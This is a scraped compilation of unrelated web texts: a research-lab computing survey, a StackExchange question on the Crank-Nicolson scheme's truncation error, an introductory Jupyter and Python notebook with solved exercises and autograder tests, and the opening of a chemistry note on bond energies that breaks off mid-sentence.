• storage, e.g. Oracle – a disk shelf could provide 70 TB - 110 TB depending on mirroring strategy
• cost is $33K, about $302/TB
• backup - LTO-6 tape library, 60 tape cartridge slots, backs up 150 TB
• cost is $14K
Survey
1. What computing needs do you have in your research lab? (Choose any/all) a) storage b) servers c) desktop d) computing (e.g. supercomputer) e) backup f) other
2. How much storage space do you need? (choose one) a) 1 TB b) 2 TB c) 5 TB d) 10 TB e) more
3) How many servers do you run? a) 0 b) 1 c) 2 d) 5 e) more
4) Can they be consolidated into a single virtual machine?
5) Do you have an interest in outsourcing some of your computing needs, e.g. to OIT, CSRs, or off-campus services?
6) Do you have any other comments?
https://math.stackexchange.com/questions/2285614/taylor-series-expansion-for-pde

# Taylor series expansion for PDE
Exercise 4: The Crank-Nicolson scheme for $u_t + a u_x = 0$ is given by $$\frac{U_{j,n+1}-U_{j,n}}{\Delta t} + \frac{a}{2}\frac{D_xU_{j,n}}{2\Delta x} + \frac{a}{2}\frac{D_xU_{j,n+1}}{2\Delta x} = 0 .$$ Show that the LTE is given by $$\mathcal{L}_\Delta u = au_{xxx} \left(\frac{1}{6} + \frac{p^2}{12}\right) {\Delta x}^2 + O({\Delta x}^3,{\Delta t}^3) ,$$ where $p = a{\Delta t}/{\Delta x}$. Find the amplification factor and find the conditions for stability.
I have expanded this about a dozen times, and I do not get the correct answer. Can someone please show me?
My working
$$\frac{u(x, t+\delta t) - u(x,t)}{\delta t} + \frac{a}{2}\, \frac{u(x+\delta x, t) - u(x-\delta x, t)}{2\,\delta x} + \frac{a}{2}\, \frac{u(x+\delta x, t+\delta t) - u(x-\delta x, t+\delta t)}{2\,\delta x}$$
expanding using taylor series I get
$$\frac{1}{\delta t} [ u + u_{t} \delta t + \frac{u_{tt}}{2} \delta t^{2} + O ( \Delta t^{3})]$$
$$\frac{1}{\delta x^{2}} \left[ u_{xx}\, \delta x^{2} + \frac{1}{12} u_{xxxx}\, \delta x^{4} + O(\Delta x^{6})\right]$$
$$u_{xx} + u_{xxt} \delta t + O(\Delta^{2}) +\frac{1}{12}u_{xxxx} \delta x^{2} + \frac{1}{12} u_{xxxxt} \delta x^{2} \delta t$$
these are the three terms I get after expanding for each one, however after rearranging, and using $u_t = -au_x$, I still am not able to get the correct answer.
I am hoping someone can show me as I really need to know this for my exam.
Thank you,
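One way to cross-check the claimed result without redoing the algebra is numerical: apply the scheme's operator to an exact solution of $u_t + a u_x = 0$ and compare the residual with $a u_{xxx}\left(\tfrac{1}{6} + \tfrac{p^2}{12}\right)\Delta x^2$. A small sketch (the test function and the sample point are arbitrary choices):

```python
import numpy as np

a = 1.0
u = lambda x, t: np.sin(x - a * t)          # exact solution of u_t + a u_x = 0

def lte(x, t, dx, dt):
    """Crank-Nicolson operator applied to the exact solution: what is left over is the LTE."""
    cd_n   = (u(x + dx, t)      - u(x - dx, t))      / (2 * dx)
    cd_np1 = (u(x + dx, t + dt) - u(x - dx, t + dt)) / (2 * dx)
    return (u(x, t + dt) - u(x, t)) / dt + 0.5 * a * cd_n + 0.5 * a * cd_np1

x0, t0, p = 0.3, 0.0, 0.8                   # p = a*dt/dx held fixed while refining
for dx in (0.1, 0.05, 0.025):
    dt = p * dx / a
    u_xxx = -np.cos(x0 - a * t0)            # third x-derivative of the test function
    predicted = a * u_xxx * (1/6 + p**2 / 12) * dx**2
    print(f"dx={dx:<6} LTE={lte(x0, t0, dx, dt): .3e}  predicted={predicted: .3e}")
```

The computed residual shrinks by roughly a factor of four each time the mesh is halved and tracks the predicted coefficient, consistent with the stated second-order LTE.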
• Really? I have done it repeatedly and don't get the correct answer, so I am clearly doing it wrong. I will type my working out and put it up. Because it is so many expansions, I thought it would be long to type out – italy May 17 '17 at 21:36
• I have added on my answer, can you please have look and let me know, / show me the correct way, as I really need to know how to do this. Thank you. – italy May 17 '17 at 21:50
• anybody know how to it? – italy May 17 '17 at 23:01
• Sorry, I'm not familiar with this, I 've just added tag Laplace to make it more visible for audience. – zwim May 18 '17 at 5:26
• But I thought you said you had just done it and it worked for you. – italy May 18 '17 at 17:12
http://qim.dk/jupyter/

Introduction to Jupyter notebooks and Python
This is a quick introduction to Jupyter notebooks and Python. It combines key elements from several open source introductory courses on Jupyter and Python for scienfitic computing. Previous experience with programming is assumed (Elementary experience with MATLAB, R, etc. or C, C++, etc. is fine).
Author: Nicolai Riis, DTU Compute, July 2017.
Each notebook takes roughly 1 hour to go through (reading + exercises).
Consider skipping segments that are familiar to you and using the notebooks as reference during the course.
List of notebooks:
1) Introduction to Jupyter notebooks and Python – (Current)
Licence:
These notebooks are released under the Attribution 3.0 Unported Licence (https://creativecommons.org/licenses/by/3.0/). This means you are free to share and adapt the content as you please as long as you give appropriate credit, link the licence and indicate if changes are made to the material.
For the original content that these notebooks are based upon please see:
1.1 The Jupyter notebook interface
In this course, you will be using the Jupyter Notebook as a toolkit for producing reproducible and replicable work in scientific computing.
A notebook consists of a series of cells. For example, this text is in what is called a “Markdown cell”. The following cell is a “code cell”:
# this is a code cell
You can tell what the type of a cell is by selecting the cell, and looking at the toolbar at the top of the page. For example, try clicking on this cell. You should see the cell type menu displaying “Markdown”, like this:
Command mode and edit mode
In the notebook, there are two modes: edit mode and command mode. By default the notebook begins in command mode. In order to edit a cell, you need to be in edit mode.
When you are in command mode, you can press enter to switch to edit mode. The outline of the cell you currently have selected will turn green, and a cursor will appear.
When you are in edit mode, you can press escape to switch to command mode. The outline of the cell you currently have selected will turn gray, and the cursor will disappear.
Markdown cells
For example, a markdown cell might look like this in command mode (Note: the following few cells are not actually cells – they are images and just look like cells! This is for demonstration purposes only.)
Then, when you press enter, it will change to edit mode:
Now, when we press escape, it will change back to command mode:
However, you’ll notice that the cell no longer looks like it did originally. This is because IPython will only render the markdown when you tell it to. To do this, we need to “run” the cell by pressing Ctrl-Enter, and then it will go back to looking like it did originally:
Code cells
For code cells, it is pretty much the same thing. This is what a code cell looks like in command mode (again, the next few cells LOOK like cells, but are just images):
If we press enter, it will change to edit mode:
And pressing escape will also go back to command mode:
If we were to press Ctrl-Enter like we did for the markdown cell, this would actually run the code in the code cell:
Executing cells
Code cells can contain any valid Python code in them (We give a short introduction to Python in Section 1.3). When you run the cell, the code is executed and any output is displayed.
You can execute cells with Ctrl-Enter (which will keep the cell selected), or Shift-Enter (which will select the next cell).
Try running the following cell and see what it prints out:
print("Printing cumulative sum from 1-10:")
total = 0
for i in range(1, 11):
total += i
print("Sum of 1 to " + str(i) + " is: " + str(total))
print("Done printing numbers.")
You’ll notice that the output beneath the cell corresponds to the print statements in the code. Here is another example, which only prints out the final sum:
total = 0
for i in range(1, 11):
total += i
print(total)
Another way to print something out is to have that thing be the last line in the cell. For example, we could rewrite our example above to be:
total = 0
for i in range(1, 11):
total += i
total
However, this will not work unless the thing to be displayed is on the last line. For example, if we wanted to print the total sum and then a message after that, this will not do what we want (it will only print “Done computing total.”, and not the total sum itself).
total = 0
for i in range(1, 11):
total += i
total
print("Done computing total.")
If you are accustomed to Python 2, note that the parentheses are obligatory for the print function in Python 3.
1.2 The IPython kernel
When you first start a notebook, you are also starting what is called a kernel. This is a special program that runs in the background and executes Python code. Whenever you run a code cell, you are telling the kernel to execute the code that is in the cell, and to print the output (if any).
Just like if you were typing code at the Python interpreter, you need to make sure your variables are declared before you can use them. What will happen when you run the following cell? Try it and see:
a
The issue is that the variable a does not exist. We must make sure a is declared first (for example, you could set the value of a to 5 – or pick whatever value you want). Note the “=” sign is used for assigning a value. Once you have modified the above cell, you should be able to run the following cell (if you haven’t modified the above cell, you’ll get the same error!):
print("The value of 'a' is: " + str(a))
Running the above cell should work, because a has now been declared. To see what variables have been declared, you can use the %whos command:
%whos
If you ran the summing examples from the previous section, you’ll notice that total and i are listed under the %whos command. That is because when we ran the code for those examples, they also modified the kernel state.
(Note that commands beginning with a percent (%) or double percent (%%) are special IPython commands called magics. They will only work in IPython.)
Restarting the kernel
It is generally a good idea to periodically restart the kernel and start fresh, because you may be using some variables that you declared at some point, but at a later point deleted that declaration.
Your code should always be able to work if you run every cell in the notebook, in order, starting from a new kernel.
To test that your code can do this, first restart the kernel by clicking the restart button:
Then, run all cells above this one in the notebook in order by choosing Cell$\rightarrow$Run All Above from the menu above. (while having this cell selected in command mode)
There are many keyboard shortcuts for the notebook. To see a full list of these, go to Help$\rightarrow$Keyboard Shortcuts.
To learn a little more about what things are what in the IPython Notebook, check out the user interface tour, which you can access by going to Help$\rightarrow$User Interface Tour.
1.3 Quick Introduction to Python
The code you ran from the previous section was written in the Python programming language.
What is Python?
Python is a modern, general-purpose, object-oriented, high-level programming language.
General characteristics of Python:
• clean and simple language: Easy-to-read and intuitive code, easy-to-learn minimalistic syntax, maintainability scales well with size of projects.
• expressive language: Fewer lines of code, fewer bugs, easier to maintain.
Technical details:
• dynamically typed: No need to define the type of variables, function arguments or return types.
• automatic memory management: No need to explicitly allocate and deallocate memory for variables and data arrays. No memory leak bugs.
• interpreted: No need to compile the code. The Python interpreter reads and executes the python code directly.
Advantages:

• The main advantage is ease of programming, minimizing the time required to develop, debug and maintain the code.
• Well-designed language that encourages many good programming practices:
• Modular and object-oriented programming, good system for packaging and re-use of code. This often results in more transparent, maintainable and bug-free code.
• Documentation tightly integrated with the code.
• A large standard library, and a large collection of add-on packages.
Disadvantages:

• Since Python is an interpreted and dynamically typed programming language, the execution of Python code can be slow compared to compiled, statically typed programming languages, such as C and Fortran.
• Somewhat decentralized, with different environment, packages and documentation spread out at different places. Can make it harder to get started.
Modules
Most of the functionality in Python is provided by modules. The Python Standard Library is a large collection of modules that provides cross-platform implementations of common facilities such as access to the operating system, file I/O, string management, network communication, and much more.
To use a module in a Python program it first has to be imported. A module can be imported using the import statement. For example, to import the module math, which contains many standard mathematical functions, we can do:
import math
This includes the whole module and makes it available for use later in the program. For example, we can do:
x = math.cos(2 * math.pi)
print(x)
Note: Make sure you are running the code examples above (recall command: Shift+Enter).
Looking at what a module contains, and its documentation
Once a module is imported, we can list the symbols it provides using the dir function:
import math
print(dir(math))
And using the function help we can get a description of each function (almost .. not all functions have docstrings, as they are technically called, but the vast majority of functions are documented this way).
help(math.log)
math.log(10)
math.log(10, 2)
Assignment
As you have already seen, the assignment operator in Python is =. Python is a dynamically typed language, so we do not need to specify the type of a variable when we create one.
Assigning a value to a new variable creates the variable:
# variable assignments
x = 1.0
Although not explicitly specified, a variable does have a type associated with it. The type is derived from the value that was assigned to it.
type(x)
Try changing x in the code cells above to an integer or bool (True,False) and check the type again.
Type casting
We can “cast” a type from one to another as follows.
x = 1.5
print(x, type(x))
x = int(x) #Change float to int (truncates the decimal part)
print(x, type(x))
This is used a lot when printing, casting everything to a string (str). If you remove the str() around the x, then the print function will fail. (See the section on print further down.)
print("The value of x is: " + str(x))
Operators and comparisons
Most operators and comparisons in Python work as one would expect:
• Arithmetic operators +, -, *, / (division), // (integer division), ** (power)
1 + 2, 1 - 2, 1 * 2, 1 // 2
1.0 + 2.0, 1.0 - 2.0, 1.0 * 2.0, 1.0 / 2.0
Note: The / operator always performs a floating point division in Python 3.x.
This is not true in Python 2.x, where the result of / is always an integer if the operands are integers.
To be more specific, 1/2 = 0.5 (a float) in Python 3.x, whereas 1/2 = 0 (an int) in Python 2.x (but 1.0/2 = 0.5 in Python 2.x).
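As a quick extra illustration of the division operators in Python 3 (this cell is only an added example):
print(1 / 2)    # floating point division: 0.5
print(1 // 2)   # integer (floor) division: 0
print(7 // 2)   # 3
print(2 ** 10)  # the power operator: 1024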
• The boolean operators are spelled out as the words and, not, or.
True and False
not False
• Comparison operators >, <, >= (greater or equal), <= (less or equal), == (equality), is (identity, i.e. the same object).
2 > 1, 2 < 1
# equality
[1,2] == [1,2]
# objects identical?
l1 = l2 = [1,2]
l1 is l2
Compound types: Strings, Lists, Tuples and Dictionaries
Strings
Strings are the variable type that is used for storing text messages.
s = "Hello world"
type(s)
# length of the string: the number of characters
len(s)
We can index a character in a string using []:
s[0]
Heads up MATLAB users: Indexing starts at 0!
We can extract a part of a string using the syntax [start:stop], which extracts characters between index start and stop -1 (the character at index stop is not included):
s[0:5]
s[4:5]
If we omit either (or both) of start or stop from [start:stop], the default is the beginning and the end of the string, respectively:
s[:5]
s[6:]
We can also define the step size using the syntax [start:end:step] (the default value for step is 1, as we saw above):
s[::1]
s[::2]
This technique is called slicing. Read more about the syntax here: http://docs.python.org/release/2.7.3/library/functions.html?highlight=slice#slice
Python has a very rich set of functions for text processing. See for example http://docs.python.org/2/library/string.html for more information.
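A few of the most commonly used string methods, plus negative indexing, are shown below as an extra example (s is still the string "Hello world" from above):
print(s.upper())                     # 'HELLO WORLD'
print(s.replace("world", "there"))   # 'Hello there'
print(s.split(" "))                  # ['Hello', 'world']
print(s[-1])                         # negative indices count from the end: 'd'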
String formatting examples
print("str1", "str2", "str3") # The print function prints its arguments separated by a space
print("str1", 1.0, False, -1j) # The print function converts all arguments to strings
print("value = %f" % 1.0) # we can use C-style string formatting
# alternative, more intuitive way of formatting a string
s3 = 'value1 = {0}, value2 = {1}'.format(3.1415, 1.5)
print(s3)
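If you are running Python 3.6 or newer, so-called f-strings are a third option; this is only a supplementary example:
value1, value2 = 3.1415, 1.5
print(f"value1 = {value1}, value2 = {value2}")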
List
Lists are very similar to strings, except that each element can be of any type.
The syntax for creating lists in Python is [...]:
l = [1,2,3,4]
print(type(l))
print(l)
We can use the same slicing techniques to manipulate lists as we could use on strings:
print(l)
print(l[1:3])
print(l[::2])
Python lists can be inhomogeneous and arbitrarily nested:
nested_list = [1, [2, [3, [4, [5]]]]]
nested_list
s
# convert a string to a list by type casting:
s2 = list(s)
s2
Adding, inserting, modifying, and removing elements from lists
# create a new empty list
l = []
# add elements using append
l.append("A")
l.append("d")
l.append("d")
print(l)
We can modify lists by assigning new values to elements in the list. In technical jargon, lists are mutable.
l[1] = "p"
l[2] = "q"
print(l)
Remove first element with specific value using ‘remove’
l.remove("A")
print(l)
Remove an element at a specific location using del:
del l[1]
print(l)
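We can also insert an element at a specific index using insert (an extra example continuing with the list l from the cells above):
l.insert(0, "i")
l.insert(1, "n")
print(l)   # ['i', 'n', 'p']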
Tuples
Tuples are like lists, except that they cannot be modified once created, that is they are immutable.
In Python, tuples are created using the syntax (..., ..., ...), or even ..., ...:
point = (10, 20)
print(point, type(point))
We can unpack a tuple by assigning it to a comma-separated list of variables:
x, y = point
print("x =", x)
print("y =", y)
If we try to assign a new value to an element in a tuple we get an error:
point[0] = 20
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
<ipython-input-114-ac1c641a5dca> in <module>()
----> 1 point[0] = 20
TypeError: 'tuple' object does not support item assignment
Dictionaries
Dictionaries are also like lists, except that each element is a key-value pair. The syntax for dictionaries is {key1 : value1, ...}:
params = {"parameter1" : 1.0,
"parameter2" : 2.0,
"parameter3" : 3.0,}
print(type(params))
print(params)
print("parameter1 = " + str(params["parameter1"]))
print("parameter2 = " + str(params["parameter2"]))
print("parameter3 = " + str(params["parameter3"]))
params["parameter1"] = "A"
params["parameter2"] = "B"
params["parameter4"] = "D"
print("parameter1 = " + str(params["parameter1"]))
print("parameter2 = " + str(params["parameter2"]))
print("parameter3 = " + str(params["parameter3"]))
print("parameter4 = " + str(params["parameter4"]))
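Two other handy dictionary operations, shown here as an extra example, are testing whether a key exists with the in operator and looking up a key with a default value using get:
print("parameter1" in params)         # True
print("parameter5" in params)         # False
print(params.get("parameter5", 0.0))  # returns the default 0.0 instead of raising a KeyError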
Control Flow
Conditional statements: if, elif, else
The Python syntax for conditional execution of code uses the keywords if, elif (else if), else:
statement1 = False
statement2 = False
if statement1:
print("statement1 is True")
elif statement2:
print("statement2 is True")
else:
print("statement1 and statement2 are False")
Here, for the first time, we encounter a peculiar and unusual aspect of the Python programming language: program blocks are defined by their indentation level.
Compare to the equivalent C code:
if (statement1)
{
printf("statement1 is True\n");
}
else if (statement2)
{
printf("statement2 is True\n");
}
else
{
printf("statement1 and statement2 are False\n");
}
In C, blocks are defined by the enclosing curly brackets { and }, and the level of indentation (white space before the code statements) does not matter at all; it is completely optional.
But in Python, the extent of a code block is defined by the indentation level (usually a tab or say four white spaces). This means that we have to be careful to indent our code correctly, or else we will get syntax errors.
Examples:
statement1 = statement2 = True
if statement1:
if statement2:
print("both statement1 and statement2 are True")
# Bad indentation!
if statement1:
if statement2:
print("both statement1 and statement2 are True") # this line is not properly indented
Try fixing the indentation in the above code cell so it runs without error
statement1 = False
if statement1:
print("printed if statement1 is True")
print("still inside the if block")
if statement1:
print("printed if statement1 is True")
print("now outside the if block")
Loops
In Python, loops can be programmed in a number of different ways. The most common is the for loop, which is used together with iterable objects, such as lists. The basic syntax is:
for loops:
for x in [1,2,3]:
print(x)
The for loop iterates over the elements of the supplied list, and executes the loop body once for each element. Any kind of iterable object (not just lists) can be used in the for loop. For example:
for x in range(4): # by default range start at 0
print(x)
Note: range(4) does not include 4 !
for x in range(-3,3):
print(x)
for word in ["scientific", "computing", "with", "python"]:
print(word)
To iterate over key-value pairs of a dictionary:
params.items() #Gives a view of (key, value) pairs.
for key, value in params.items():
print(key + " = " + str(value))
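If we also want the position of each element while looping, the built-in enumerate function provides it; this is a supplementary example:
for idx, word in enumerate(["scientific", "computing", "with", "python"]):
    print(idx, word)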
List comprehensions: Creating lists using for loops:
A convenient and compact way to initialize lists:
l1 = [x**2 for x in range(0,5)]
print(l1)
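A list comprehension can also contain a condition that filters the elements (an additional example):
l2 = [x**2 for x in range(0,10) if x % 2 == 0]   # squares of the even numbers only
print(l2)   # [0, 4, 16, 36, 64]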
while loops:
i = 0
while i < 5:
print(i)
i = i + 1
print("done")
Note that the print("done") statement is not part of the while loop body because of the difference in indentation.
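Inside any loop, break exits the loop immediately and continue skips to the next iteration; the following cell is an extra example:
for i in range(10):
    if i == 3:
        continue   # skip 3 and move on to the next value
    if i == 6:
        break      # stop the loop entirely
    print(i)       # prints 0, 1, 2, 4, 5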
Functions
A function in Python is defined using the keyword def, followed by a function name, a signature within parentheses (), and a colon :. The following code, with one additional level of indentation, is the function body.
def func0():
print("test")
func0()
Optionally, but highly recommended, we can define a so-called “docstring”, which is a description of the function's purpose and behavior. The docstring should follow directly after the function definition, before the code in the function body.
def func1(s):
"""
Print a string 's' and tell how many characters it has
"""
print(s + " has " + str(len(s)) + " characters")
help(func1)
func1("test")
Functions that return a value use the return keyword:
def square(x):
"""
Return the square of x.
"""
return x ** 2
square(4)
We can return multiple values from a function using tuples (see above):
def powers(x):
"""
Return a few powers of x.
"""
return x ** 2, x ** 3, x ** 4
powers(3)
x2, x3, x4 = powers(3)
print(x3)
Default argument and keyword arguments
In a definition of a function, we can give default values to the arguments the function takes:
def myfunc(x, p=2, debug=False):
if debug:
print("evaluating myfunc for x = " + str(x) + " using exponent p = " + str(p))
return x**p
If we don’t provide a value for the debug argument when calling the function myfunc, it defaults to the value provided in the function definition:
myfunc(5)
myfunc(5, debug=True)
If we explicitly list the names of the arguments in the function call, they do not need to come in the same order as in the function definition. These are called keyword arguments, and they are often very useful in functions that take a lot of optional arguments.
myfunc(p=3, debug=True, x=7)
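Python also lets us create small unnamed functions with the lambda keyword. This is only a supplementary example (square_plus_one is just an example name) and is not needed for the exercises below:
square_plus_one = lambda x: x**2 + 1
print(square_plus_one(3))   # 10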
Classes
Classes are the key features of object-oriented programming. A class is a structure for representing an object and the operations that can be performed on the object.
In Python a class can contain attributes (variables) and methods (functions).
A class is defined almost like a function, but using the class keyword, and the class definition usually contains a number of class method definitions (a function in a class).
• Each class method should have an argument self as its first argument. This object is a self-reference.
• Some class method names have special meaning, for example __init__ (called when a new instance is created) and __str__ (called when the instance is converted to a string, e.g. by print), both of which are used below:
class Point:
"""
Simple class for representing a point in a Cartesian coordinate system.
"""
def __init__(self, x, y):
"""
Create a new Point at x, y.
"""
self.x = x
self.y = y
def translate(self, dx, dy):
"""
Translate the point by dx and dy in the x and y direction.
"""
self.x += dx
self.y += dy
def __str__(self):
return("Point at [%f, %f]" % (self.x, self.y))
To create a new instance of a class:
p1 = Point(0, 0) # this will invoke the __init__ method in the Point class
print(p1) # this will invoke the __str__ method
To invoke a class method in the class instance p:
p2 = Point(1, 1)
p1.translate(0.25, 1.5)
print(p1)
print(p2)
Note that calling class methods can modify the state of that particular class instance, but does not affect other class instances or any global variables.
That is one of the nice things about object-oriented design: code such as functions and related variables are grouped in separate and independent entities.
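As a small added illustration, translating one Point instance leaves another instance untouched (pa and pb are fresh example names):
pa = Point(0, 0)
pb = Point(0, 0)
pa.translate(1, 1)
print(pa)   # Point at [1.000000, 1.000000]
print(pb)   # Point at [0.000000, 0.000000]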
Exceptions
In Python, errors are managed with a special language construct called “exceptions”. When an error occurs, an exception can be raised, which interrupts the normal program flow and falls back to the closest enclosing try-except statement in the code.
To generate an exception we can use the raise statement, which takes an argument that must be an instance of the class BaseException or a class derived from it.
raise Exception("description of the error")
A typical use of exceptions is to abort functions when some error condition occurs, for example:
def my_function(arguments):
if not verify(arguments):
raise Exception("Invalid arguments")
# rest of the code goes here
To gracefully catch errors that are generated by functions and class methods, or by the Python interpreter itself, use the try and except statements:
try:
# normal code goes here
except:
# code for error handling goes here
# this code is not executed unless the code
# above generated an error
For example:
try:
print("test")
# generate an error: the variable test is not defined
print(test)
except:
print("Caught an exception")
To get information about the error, we can access the Exception class instance that describes the exception, for example by catching it as follows:
except Exception as e:
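For instance, the earlier example can be extended as follows (an added illustration):
try:
    print(test)   # the variable test is not defined, so this raises a NameError
except Exception as e:
    print("Caught an exception: " + str(e))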
1.4 Exercises
At the end of each notebook there will be a few coding assignments. To evaluate the assignments we provide automated tests that your code must pass. These will be in one or more cells after the code you need to write. The tests are meant as a guide to check that your implementation is correct and may not catch all errors. In the following exercise, there is one test cell after the cell where you should put your answer.
Exercise 1: Hello (1 point)
Implement the function hello and make sure the test cells runs without any errors. You will need to delete the line with raise NotImplementedError, write your own solution, and then re-run the cell before running the test cell. Each time you change code in a cell, you will need to re-run that cell before running any other cells that depend on it!
def hello(name):
"""Returns a message containing "Hello, <name>!",
where <name> is passed in as an argument.
Parameters
----------
name : string
The name of the person to say hello to
Returns
-------
the message containing "Hello, <name>!"
"""
return "Hello, " + name + "!"
# try running your hello function with your own name and see what
# it returns
# Hint: if the test cell is not passing, but your function seems
# to be showing the right thing, make sure you are actually
# returning a value from your function! You should be using
# return, not print. For example, this cell should display:
#
# Your function returned: Hello, Reverend Bayes!
#
# and not:
#
# Hello, Reverend Bayes!
message = hello("Reverend Bayes")
print("Your function returned: " + str(message))
When completing a problem set, it is often useful to supplement the autograder tests with test cases of your own. Below, we provide you with a “scratch” cell to be used for your own testing purposes.
Keep in mind, however, that writing your own test cases is **completely optional** — these are only here to help you as you complete the assignment. This means that you will *not* be graded on anything you include in this cell!
# add your own test cases in this cell!
"""(1 point) Test code for the 'hello' function. This cell should NOT give any errors when it is run."""
from nose.tools import assert_equal
assert_equal(hello("Jessica"), "Hello, Jessica!")
assert_equal(hello("jessica"), "Hello, jessica!")
assert_equal(hello("Tom"), "Hello, Tom!")
assert_equal(hello("123"), "Hello, 123!")
print("Success!")
Exercise 2: Cosine function for lists
Unfortunately the cosine function from the math library is not able to accept lists as input. So if we wanted to get the cosine of, say, the numbers in the list [0, 1/2 Pi, Pi], we would have to input each element one at a time!
Pi = math.pi
cosines = math.cos([0,1/2*Pi,Pi]) # this raises a TypeError, since math.cos expects a single number
Implement the function cos_list to output the cosine of each real number from an input list of real numbers and make sure the test cells runs without any errors. You will need to delete the line with raise NotImplementedError, write your own solution, and then re-run the cell before running the test cell. Each time you change code in a cell, you will need to re-run that cell before running any other cells that depend on it!
def cos_list(l):
"""Returns a list with the cosine of each element of an input list,
where the list is passed in as an argument "l".
Parameters
----------
l : list (non-empty) of real numbers, i.e., [5] or [5,3.14] or [1,9.2,-15]
Returns
-------
A list with the cosines of each real number in l.
"""
import math
if type(l) is not list:
raise Exception("Input is not a list")
if not l:
raise Exception("Input list is empty")
for x in l:
if (type(x) is not float) and (type(x) is not int):
raise ValueError("Input list must only contain real numbers")
cosines = []
for x in l:
cosines.append(math.cos(x))
return cosines
# add your own test cases in this cell!
"""(2 points) Test of results for the 'cos_list' function. This cell should NOT give any errors when it is run."""
from nose.tools import assert_equal
assert_equal([round( elem, 4) for elem in cos_list([0,1,3])],[1.0, 0.5403, -0.99])
assert_equal([round( elem, 4) for elem in cos_list([math.pi,1/2*math.pi])],[-1.0, 0.0])
assert_equal([round( elem, 4) for elem in cos_list([37])],[0.7654])
assert_equal([round( elem, 4) for elem in cos_list([9.13,-15,0.9])],[-0.9569, -0.7597, 0.6216])
print("Success!")
Consider improving the cos_list function to throw exceptions if it gets unexpected input. To do this, make sure to check if the input is actually a list and that it contains real numbers.
That is if input is not a list:
raise Exception("Input is not a list")
and if input is an empty list:
raise Exception("Input list is empty")
and if input list contains anything else than real numbers (float or integer):
raise ValueError("Input list must only contain real numbers")
"""(1 point) Test input checking for the 'cos_list' function. This cell should NOT give any errors when it is run."""
from nose.tools import assert_equal, assert_raises
assert_raises(Exception, cos_list, 5)
assert_raises(Exception, cos_list, math.pi)
assert_raises(Exception, cos_list, "hello")
assert_raises(ValueError, cos_list, [0,"hello"])
assert_raises(ValueError, cos_list, ["hello"])
assert_raises(ValueError, cos_list, [[3.14]])
print("Success!")
"""(1 point) Test input checking for the 'cos_list' function. This cell should NOT give any errors when it is run."""
from nose.tools import assert_equal, assert_raises
assert_raises(Exception, cos_list, [])
print("Success!")
Exercise 3: Building a class for persons with (name,sex,age)
Create a class called Person that contains the name, age and sex of a person.
A person should be added as follows:
p1 = Person(name='Billy', age=12, sex='M')
which should return an object p1, with p1.name='Billy', p1.age=12, p1.sex='M'.
The class should be able to handle missing inputs by assigning them the “None” type.
That is if:
p2 = Person(name='Billy', sex='M')
then p2.age should return None.
If the sex is initialized as 'M' for male, but no name is set, then the name should default to 'John Doe'.
Similarly, if the sex is 'F', the name should default to 'Jane Doe' if no name is set.
Finally, print(p1) should print
Name: Billy, Age: 12, Sex: M.
class Person:
"""
A class representing a person from their name, age and sex.
Init example:
p1 = Person(name='Billy', age=12, sex='M')
outputs:
print(p1)
Name: Billy, Age: 12, Sex: M.
"""
def __init__(self, name=None, age=None, sex=None):
"""
Init person
"""
self.sex = sex
self.age = age
self.name = name
self.relatives = []
if self.name is None:
if self.sex == "F":
self.name = 'Jane Doe'
elif self.sex == "M":
self.name = 'John Doe'
def add_relatives(self, person):
if type(person) is Person:
self.relatives.append(person)
else:
raise Exception('Trying to add someone that is not a Person')
def show_relatives(self):
for p in self.relatives:
print(p)
def __str__(self):
return("Name: {}, Age: {}, Sex: {}.".format(self.name, self.age, self.sex))
# add your own test cases in this cell!
"""(2 points) Test input checking for the 'Person' Class. This cell should NOT give any errors when it is run."""
from nose.tools import assert_equal, assert_raises
test_p = Person(name='Bob', age=15, sex='M')
assert_equal(test_p.name, 'Bob')
assert_equal(test_p.age,15)
assert_equal(test_p.sex,'M')
test_q = Person(age=15, sex='M')
assert_equal(test_q.name, 'John Doe')
assert_equal(test_q.age,15)
assert_equal(test_q.sex,'M')
test_w = Person(sex='F')
assert_equal(test_w.name, 'Jane Doe')
assert_equal(test_w.age,None)
assert_equal(test_w.sex,'F')
test_x = Person()
assert_equal(test_x.name, None)
assert_equal(test_x.age,None)
assert_equal(test_x.sex,None)
assert_equal(test_p.__str__(),"Name: Bob, Age: 15, Sex: M.")
print("Success!")
Improve the Person class by adding the notion of relatives. Specifically add two new methods
add_relatives and show_relatives.
A person's relatives should be added as follows:
p1 = Person(name='Billy', age=12, sex='M')
p2 = Person(name='Charlie', age=37, sex='M')
p3 = Person(name='Alice', age=32, sex='F')
p1.add_relatives(p2)
p1.add_relatives(p3)
and shown by printing each relative with show_relatives:
p1.show_relatives()
should print
Name: Charlie, Age: 37, Sex: M.
Name: Alice, Age: 32, Sex: F.
# add your own test cases in this cell!
"""(2 points) Test input checking for the 'Person' Class. This cell should NOT give any errors when it is run."""
from nose.tools import assert_equal, assert_raises
import sys
from io import StringIO
test_p = Person(name='Bob', age=15, sex='M')
test_q = Person(age=15, sex='M')
test_w = Person(sex='F')
test_p.add_relatives(test_q)
test_p.add_relatives(test_w)
saved_stdout = sys.stdout
try:
out = StringIO()
sys.stdout = out
test_p.show_relatives()
output = out.getvalue().strip()
assert output == 'Name: John Doe, Age: 15, Sex: M.\nName: Jane Doe, Age: None, Sex: F.'
finally:
sys.stdout = saved_stdout
print("Success!")
As mentioned in the previous problem, Markdown is a special way of writing text in order to specify formatting, like whether text should be bold, italicized, etc.
You can use the following website as a reference for Markdown: https://help.github.com/articles/markdown-basics
• Hint #1: after editing the Markdown, you will need to run the cell so that the formatting appears.
• Hint #2: try selecting this cell so you can see what the Markdown looks like when you’re editing it. Remember to run the cell again to see what it looks like when it is formatted.
One of the advantages of using Markdown is that it allows us to easily write equations using LaTeX.
You should be able to find most of the symbols you need on this page. Alternatively, if you forget the mathematical operation that a particular symbol corresponds to, check the Wikipedia page on mathematical notation.
Basic equation formatting
To format an equation using LaTeX, you must wrap the text in dollar signs, $like this$. (or double dollar signs for centered $$like this$$)
Inspect the markdown below by entering edit mode in the cell and have a look at the formatting.
$$F(y)=\int_{-\infty}^y \frac{1}{\sqrt{2\pi\sigma^2}}e^{\frac{-(x-\mu)^2}{2\sigma^2}}dx$$
https://www.toktol.com/notes/context/3503/sampler/chemistry/bond-energies
# Bond energies
The enthalpy change ($\Delta H$) of a reaction is related to the bond energies.
Every bond in a molecule has a set bond energy. A bond with a higher energy is a stronger bond.
The total bond energy of the reactants is found by adding the bond energies of all bonds in the reactants.
Likewise, the total bond energy of the products is found by adding the bond energies of all the bonds in the products.
$\Delta H$ is equal to the difference between the total bond energy of the reactants and the total bond energy of the products. Essentially:
